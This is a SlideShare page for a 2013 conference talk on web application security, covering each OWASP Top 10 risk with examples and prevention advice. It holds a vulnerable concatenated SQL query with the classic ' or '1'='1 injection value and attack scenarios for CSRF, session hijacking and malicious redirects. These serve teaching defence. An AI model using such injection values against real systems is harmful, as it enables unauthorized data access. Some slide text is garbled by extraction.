Oh, WASP! Security Essentials for Web Apps

1,540 views

Published on

The past few years have seen a rapid increase in business efficiency through Web-based applications. Unfortunately, a dramatic increase in the number of web application vulnerabilities has followed. Insecure web applications can be disastrous for mission critical businesses and users' sensitive data. More than 70 percent of security vulnerabilities are due to flaws in the application rather than firewall breaches. Bennie Paul explains how security testing has become an indispensable part of the SDLC for businesses operating online today. OWASP (Open Web Application Security Project) provides open source tools, code, and materials to develop, test, and maintain application security. Monitoring the “OWASP Top 10” web application security flaws is highly recommended as part of an organization’s testing methodology. Vulnerabilities identified are compared against the organization’s security objectives and regulations, and categorized accordingly for remediation. Benny guides you through the OWASP vulnerabilities, technique, framework, and preventive measures that you can adopt for building better software.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,540
On SlideShare
0
From Embeds
0
Number of Embeds
21
Actions
Shares
0
Downloads
241
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Oh, WASP! Security Essentials for Web Apps

  1. 1. BW8 Concurrent Session 11/13/2013 2:15 PM "Oh, WASP! Security Essentials for Web Apps" Presented by: Benny Paul Cognizant Technology Solutions Brought to you by: 340 Corporate Way, Suite 300, Orange Park, FL 32073 888 268 8770 904 278 0524 sqeinfo@sqe.com www.sqe.com
  2. 2. Benny Paul Cognizant Technology Solutions Benny Paul brings more than fifteen years of IT experience to Cognizant Testing Services where he is responsible for program management, strategic planning, and delivery of QA Services. Benny is experienced in building and managing large scale QA programs in multiple domains, with resolute focus on improving QA maturity practices, enhancing quality engineering and delivery, incorporating optimization techniques, and implementing practical and effective process improvement methods. Benny’s passion for business development, maintaining customer relationships and people management through motivation and inspiration, further contributes to his ability to manage large programs and deliver business value to Cognizant’s global clients.
  3. 3. Oh, WASP! Security Essentials for Web Apps Benny Paul Cognizant Testing Services Nov 11, 2013 1 | ©2013, Cognizant
  4. 4. Introduction Purpose of Session - Provide Overview of Web Application Security - OWASP Top 10 What is Web Application Security? - A brief discussion - Attacker’s hotspots Top Security Problems on the web today - Recent Nightmares - Some statistics Understand OWASP 2013 Top 10 Vulnerabilities - Define the vulnerabilities - How do we protect against them? 2 | ©2013, Cognizant www.owasp.org
  5. 5. Credits & References !  Documents copyrighted Open Web Application Security Project, and freely downloaded from www.owasp.org. !  OWASP Top Ten titled "The Ten Most Critical Web Application Security Vulnerabilities" 2013 update. https://www.owasp.org/index.php/Top_10_2013-Top_10 !  The OWASP Tutorial Series by Jerry Hoff https://www.owasp.org/index.php/Main_Page https://www.owasp.org/index.php/OWASP_Appsec_Tutorial_Series !  Several Application Security Testing related sites and content on the web like iTeach etc.. 3 | ©2013, Cognizant www.owasp.org
  6. 6. What is Web Application Security? ! Not Network Security ! Starts in the initial planning stages ! Continues through coding, testing, and deployment ! Doesn’t finish until the lifecycle is completely finished Likelihood of a successful web application attack -A web application is attacked at 1-in-3 days on average - Easy to exploit without special tools or knowledge - Little chance of being detected Consequences: -Unauthorized Access to web and application servers -Database Corruption and Disclosure of contents -Breach in user authentication and access control - Website defacement 4 | ©2013, Cognizant www.owasp.org
  7. 7. Percentage of Websites Vulnerability by Class Who are we up against? Who What Why Organized Crime Cash Espionage (Nation State & Corporate) Data Theft & Intellectual Property Competitive Advantage Hackers / Script Kiddies 5 Data & Identity Theft Defacement & Denial of Service Ego & Credibility building | ©2013, Cognizant www.owasp.org
  8. 8. Most sites are not secure… An attacker can access unauthorized data, attack users using your website! 6 | ©2013, Cognizant www.owasp.org
  9. 9. Look at Web App through eyes of Attacker 7 | ©2013, Cognizant www.owasp.org
  10. 10. Hot Spots for Attacker 8 | ©2013, Cognizant www.owasp.org
  11. 11. Recent Security Flaws… Real Attack on Australian Tax office - Attacker changed the tax id in the url, got info on 17,000 companies Bank W e Aug 15 bsite Hacke d! 2013 http://articles.timesofindia.indiatimes.com/2013-08-15/delhi/41412603_1_bank-accountsarun-kumar-machines 9 | ©2013, Cognizant www.owasp.org
  12. 12. So, how can we fix this? 10 | ©2013, Cognizant www.owasp.org
  13. 13. OWASP - What is that? Open Web Application Security Project www.owasp.org "  International not-for-profit charitable Open Source Org "  Top Ten "  Guides towards Building Secure Web Apps Application Testing Code Reviews "  OWASP Resources and Community Documentation & Wiki Code Projects Chapters Conferences "  Participation in OWASP is free and open to all! 11 | ©2013, Cognizant www.owasp.org
  14. 14. Most Critical Web App Security Risks https://www.owasp.org/index.php/Top_10_2013-Top_10 12 | ©2013, Cognizant www.owasp.org
  15. 15. OWASP Top 10 Risks 1 Injection 13 | ©2013, Cognizant www.owasp.org
  16. 16. 1 - Injection Easy Common Critical https://www.owasp.org/index.php/Top_10_2013-A1-Injection 14 | ©2013, Cognizant www.owasp.org
  17. 17. 1 - Injection String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; String query = "SELECT * FROM accounts WHERE custID='" + 209907 + "'"; Retu rns 1 row Web Server DB String query = "SELECT * FROM accounts WHERE custID='" + 209907’ or ‘1’=‘1+ "'"; 15 | ©2013, Cognizant www.owasp.org
  18. 18. 1 - Injection How do I Prevent 'Injection'? " Use Parameterized Queries   "Stored Procedures instead of Dynamic SQL " OWASP ESAPI " Whitelist Input validation https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet 16 | ©2013, Cognizant www.owasp.org
  19. 19. OWASP Top 10 Risks 2 Broken Authentication & Session Management 17 | ©2013, Cognizant www.owasp.org
  20. 20. 2 - Broken Authentication & Session Mgmt ncryption shing or e using ha en stored tected wh aren’t pro dentials ication cre weak acco Authent unt m Session IDs are exposed in the URL anagemen t functions ter login n’t Rotate af eout, do IDs don’t tim Session 18 | ©2013, Cognizant www.owasp.org
  21. 21. 2 - Broken Authentication & Session Mgmt Scenario 1 – Session id in URL http://myairline.com/sale/saleitems jsessionid=47HDFKWkJDS8723HAUG12HG? dest=Sydney -An authenticated User shares the airline offer (link) - The link has his session id since app supports URL rewriting - When friends open the link, they have access to his session, Credit card etc. Scenario 2 – Improper Application Timeouts -User accesses site in a public computer - Closes browser instead of logging out - Attacker uses same browser shortly, browser is still authenticated Scenario 3 – No restriction on Login attempts - In 2009, an attacker gained admin access to a Twitter server due to no restriction on the no. of login attempts. - Attacker targets a support staff's password using “brute force” - Gains admin access to 33 accounts belonging to celebrities, politicians 19 | ©2013, Cognizant www.owasp.org
  22. 22. 2 - Broken Authentication & Session Mgmt How do I Prevent ‘Authentication’ and ‘Session’ related risks'? A single set of strong authentication and session management controls. Such controls should strive to: -Meet all the authentication and session management requirements defined in OWASP’s Application Security Verification Standard (ASVS) areas V2 (Authentication) and V3 (Session Management). https://www.owasp.org/index.php/ASVS 20 | ©2013, Cognizant www.owasp.org
  23. 23. OWASP Top 10 Risks 3 Cross Site Scripting (XSS) 21 | ©2013, Cognizant www.owasp.org
  24. 24. 3 - Cross Site Scripting (XSS) XSS is targeted to attack other users’ browse 22 | ©2013, Cognizant www.owasp.org
  25. 25. 3 - Cross Site Scripting (XSS) Using Javascript, an attacker can steal Session ID / coockie, rewrite webpages etc.. 23 | ©2013, Cognizant www.owasp.org
  26. 26. 3 - Cross Site Scripting (XSS) How do I Prevent ‘XSS'? " Data Escaping techniques " Contextual Encoding   "Auto Sanitation Libaries " Content Secure Policy (CSP) " Whitelist Input validation https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet 24 | ©2013, Cognizant www.owasp.org
  27. 27. OWASP Top 10 Risks 4 Insecure Direct Object References 25 | ©2013, Cognizant www.owasp.org
  28. 28. 4 - Insecure Direct Object References Unauthorized access to objects thru Parameter Tampering.. 26 | ©2013, Cognizant www.owasp.org
  29. 29. 4 - Insecure Direct Object References 1 4 2 5 3 6 27 | ©2013, Cognizant www.owasp.org
  30. 30. 4 - Insecure Direct Object References How Do I Prevent? " Avoid exposing your private object references to users " Validate any private object references " Verify authorization to all referenced objects " Session indirect object references 28 | ©2013, Cognizant www.owasp.org
  31. 31. OWASP Top 10 Risks 5 Security Misconfiguration 29 | ©2013, Cognizant www.owasp.org
  32. 32. 5 - Security Misconfiguration Web Apps exposing server error messages on scree Default Acounts 30 | ©2013, Cognizant www.owasp.org
  33. 33. 5 - Security Misconfiguration Unprotected Website Directories ! 31 | ©2013, Cognizant www.owasp.org
  34. 34. 5 - Security Misconfiguration How Do I Prevent? " Directory listing disabled on your server " Disable stack traces to be returned to users " Identical configuration of Dev, QA & Prod, properly locked down with different passwords   "Periodic scans & audits to detect misconfigurations From OWASP: Development Guide: Chapter on Configuration https://www.owasp.org/index.php/Configuration Testing Guide: Configuration Management https://www.owasp.org/index.php/Testing_for_configuration_management 32 | ©2013, Cognizant www.owasp.org
  35. 35. OWASP Top 10 Risks 6 Sensitive Data Exposure 33 | ©2013, Cognizant www.owasp.org
  36. 36. 6 - Sensitive Data Exposure Sensitive Data not Protected properly! 34 | ©2013, Cognizant www.owasp.org
  37. 37. 6 - Sensitive Data Exposure Example 1: Https only during login https://OfficeEmail.com HTTP HTTPS HTTP Example 2: Man-in-the-middle Attack 35 | ©2013, Cognizant www.owasp.org
  38. 38. 6 - Sensitive Data Exposure How Do I Prevent? " Strict Transport Security in HTTP Header (converts Http to Https at the browser) " Secured sites should switch entirely to HTTPS   "Encrypt all sensitive data " Don’t store sensitive data unnecessarily – Discard them " Disable autocomplete on forms https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet 36 | ©2013, Cognizant www.owasp.org
  39. 39. OWASP Top 10 Risks 7 Missing Function Level Access Control 37 | ©2013, Cognizant www.owasp.org
  40. 40. 7 - Missing Function Level Access Control UI shows navigation to unauthorized functionsserver side authentication No http://example.com/app/getappInfo http://example.com/app/admin_getappInfo Example Access to unauthorized functions 38 | ©2013, Cognizant www.owasp.org
  41. 41. 6 - Sensitive Data Exposure How Do I Prevent? " “presentation layer access control” vs. validations at controller or business logic " Define specific roles for access to every function " Establish a solid process for ‘Managing Entitlements’ OWASP offers: ESAPI Access Control API http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/ AccessController.html OWASP Development Guide: Chapter on Authorization https://www.owasp.org/index.php/Guide_to_Authorization Testing Guide: Testing for Path Traversal https://www.owasp.org/index.php/Testing_for_Path_Traversal 39 | ©2013, Cognizant www.owasp.org
  42. 42. OWASP Top 10 Risks 8 Cross Site Request Forgery (CSRF) 40 | ©2013, Cognizant www.owasp.org
  43. 43. 8 - Cross Site Request Forgery (CSRF) Forged Http requests Easy to detect v ia Penetrat ion Testing 41 | ©2013, Cognizant www.owasp.org
  44. 44. 8 - Cross Site Request Forgery (CSRF) Example : 1. Victim browses a page from Evil.org. 2. Evil.org crafted an HTML image element that references a script to the victim's bank's website (rather than an image file), for example: 3. If the victim's bank stores his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by the victim's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without the victim's approval 42 | ©2013, Cognizant www.owasp.org
  45. 45. 8 - Cross Site Request Forgery (CSRF) How Do I Prevent CSRF? " Include unpredictable unique Token in each HTTP request   "Token in a hidden field rather than URL " Re-authentication via CAPTCHA OWASP offers: CSRF Guard to include such tokens in Java EE, .NET, or PHP apps https://www.owasp.org/index.php/CSRFGuard Other References: 43 | ©2013, Cognizant www.owasp.org
  46. 46. OWASP Top 10 Risks 9 Using Unknown Vulnerable Components 44 | ©2013, Cognizant www.owasp.org
  47. 47. 9 - Using Unknown Vulnerable Components Weak external Components – vulnerable to injection, broken access control, XSS, etc 45 | ©2013, Cognizant www.owasp.org
  48. 48. 9 - Using Unknown Vulnerable Components Components built by other Developers Dependency Developer # Web toolkits # Widgets # Runtime engines # Web servers # Framework libraries Etc…. Example: The following two vulnerable components were downloaded 22m times in 2011! Every application using these are vulnerable to attack as both components are directly accessible by application users !  !  46 | ©2013, Cognizant Apache CXF Authentication Bypass Spring Remote Code Execution www.owasp.org
  49. 49. 9 - Using Unknown Vulnerable Components How Do I Prevent? " Upgrade to newer versions " Establish security policies governing component use- like requiring certain software development practices, passing security tests, and acceptable licenses OWASP References: https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities 47 | ©2013, Cognizant www.owasp.org
  50. 50. OWASP Top 10 Risks 10 Unvalidated Redirects & Forwards 48 | ©2013, Cognizant www.owasp.org
  51. 51. 10 - Unvalidated Redirects & Forwards Easy to detect 49 | ©2013, Cognizant www.owasp.org
  52. 52. 10 - Unvalidated Redirects & Forwards Example : 1 2 3 50 | ©2013, Cognizant User receives trusted Email containing legitimate Link Hovering on link shows legitimate Website www.trustedsite.com Clicking on link redirects to www.evilsite.com www.owasp.org
  53. 53. 9 - Using Unknown Vulnerable Components How Do I Prevent? " Simply avoid using redirects and forwards " If used, don’t involve user parameters " use OWASP ESAPI to override redirect destinations OWASP References: https://www.owasp.org/index.php/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards 51 | ©2013, Cognizant www.owasp.org
  54. 54. OWASP - A Great start for your Web Apps Security! !  Read the OWASP Top Ten paper! !  Get developers trained in web app security !  Try OWASP WebGoat to learn how flaws work !  Define security rules for your application !  Get expert code review and penetration test periodically 52 | ©2013, Cognizant www.owasp.org
  55. 55. Most Critical Web App Security Risks Free download Available at OWASP.Org https://www.owasp.org/index.php/Top_10_2013-Top_10 53 | ©2013, Cognizant www.owasp.org
  56. 56. Thank you for your time Any Questions? 54 | ©2012, Cognizant www.owasp.org

×